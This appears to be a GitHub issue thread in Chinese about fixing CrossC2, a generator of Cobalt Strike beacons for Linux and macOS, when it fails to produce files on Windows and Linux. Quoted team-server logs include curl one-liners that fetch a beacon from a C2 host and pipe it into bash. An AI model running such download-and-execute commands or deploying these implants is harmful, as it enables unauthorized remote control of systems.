请问windows下gui界面无法生成文件

[Mitnick0x]

那请问windows下gui界面无法生成文件，或者是具体怎么配置呢？
1、CrossC2.cna文件配置里面的"genCC2路径为真实路径"是客户端的路径对吧，那windows下CS生成的curl链接在下载的时候报404呢
2、在windows下genCrossC2.Win.exe无法生成文件

[gloxec]

1. 在GUI生成时event界面有没有类似下面的输出呢？因为如果不是用提示的方法进行curl请求时，teamserver会默认进行404屏蔽。

05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] :    Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ https://172.16.251.1:55413/iqEBVKwHoZ
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ https://172.16.251.1:55413/a
05/01 23:31:07 *** CrossC2 MacOS x64:   curl -A o -o- -L https://172.16.251.1:55413/a | bash -s

2. 命令行运行没有生成文件吗？提示什么呢？

[Mitnick0x]

1、windows下在GUI生成时有如下输出，但第二行没有success
12/20 21:39:27 *** G:/Extensions/CrossC2/genCrossC2.Win.exe 192.168.1.102 5555 ./.cobaltstrike.beacon_keys null Linux x64 G:/
12/20 21:39:28 *** genCrossC2 beacon ->
12/20 21:39:28 *** xxx hosted CrossC2 beacon Linux x64 @ https://192.168.1.102:55413/vSUzsdcHaG
12/20 21:39:28 *** xxx hosted Script Unix Web Delivery (curl) @ https://192.168.1.102:55413/a
12/20 21:39:28 *** CrossC2 Linux x64: curl -A o -o- -L https://192.168.1.102/a | bash -s

2、命令行运行也是没有生成文件，更没有任何提示，运行直接结束。
PS G:\src> ./genCrossC2.Win.exe 192.168.1.102 5555 ./.cobaltstrike.beacon_keys null Linux x64 G:
PS G:\src>

[gloxec]

你可以直接运行.\genCrossC2.Win.exe查看介绍信息
本地测试正常，根据你的使用记录需要修改一些地方，缺少了生成的文件名称
PS G:\src> .\genCrossC2.Win.exe 192.168.1.102 5555 .\.cobaltstrike.beacon_keys null Linux x64 G:\src\test

[Mitnick0x]

直接运行程序也是啥也没有😂😂

[gloxec]

是win10吗？win10这边长期测试以及使用是ok的，或者尝试使用Linux/MacOS客户端呢？

[Mitnick0x]

是的呢，就这样没任何提示信息

[gloxec]

你在cmd窗口下运行，应该是缺少了ucrtbased.dll的问题，这个来自于VS SDK中，尝试手动下载到系统目录后再运行？

[Mitnick0x]

在cmd下运行了，然后把缺少的2个dll文件也放到C:\Windows\System32下了，然后再运行就报0xc000007b错误了

[gloxec]

我上传了一份官方原版SDK中的DLL，解压后将两个文件放入C:\Windows\System32下再运行试试

win_sdk_dll.zip

[Mitnick0x]

哈哈，都解决了，感谢大佬😄😄

[thinkycx]

Linux下也遇到了类似的问题：
genCrossC2 beacon -> 没有输出时success。
导致wget下载为文件是空。
请问应该如何排查呢？谢谢。

环境：centos、CS 3.12

补充：使用命令行工具可以正常生成：

[gloxec]

@thinkycx

环境：centos、CS 3.12

首先CrossC2目前仅有master、cs4.0、cs4.1三个分支，对应支持cs3.14、cs4.0、 >= cs4.1(4.2)
cs3.12 不支持，后续master分支也将切换至cs4.x系列

genCrossC2 beacon -> 没有输出时success。
导致wget下载为文件是空。

可尝试查看以下信息:

1. 查看指定的生成文件/tmp/CrossC2-test是否为空？
2. /tmp/CrossC2-test文件不为空时，是否是指定的URI & port 与之间重复导致？
3. 确定 genCrossC2 程序有对应目录读取key文件与生成文件的权限？可简单复制控制台中提示的语句进行运行尝试。
4. 确定key文件 (.cobaltstrike.beacon_keys)与 cna插件 & genCrossC2程序 & cobaltstrike.jar 三者之间的路径问题。
   有可能是这里key的相对路径 ./.cobaltstrike.beacon_keys 错误导致 genCrossC2程序 未读取到，可尝试指定key的绝对路径

[thinkycx]

@gloxec

感谢回复。

排查结果：
1、/tmp/CrossC2-test为空
2、有权限。
3、genCrossC2 有读取key和对应目录权限，复制到控制台可以运行。

解决办法：修改key为绝对路径。

目前正常。

[Devil-QAQ]

请问前面全部可以了 最后上线不成功 可以分析分析吗

执行感觉也很正常，就是没上线

[gloxec]

看你这里出现了[conf]: alive证明beacon已成功运行，且与c2成功建立通信。
没上线的原因可能是你cs配置了c2profile,导致teamserver无法识别来自beacon的默认通信,在weblog界面应该有许多404

你设置rebind.so后再试试:demo

编写与c2profile对应rebind.so的文档: wiki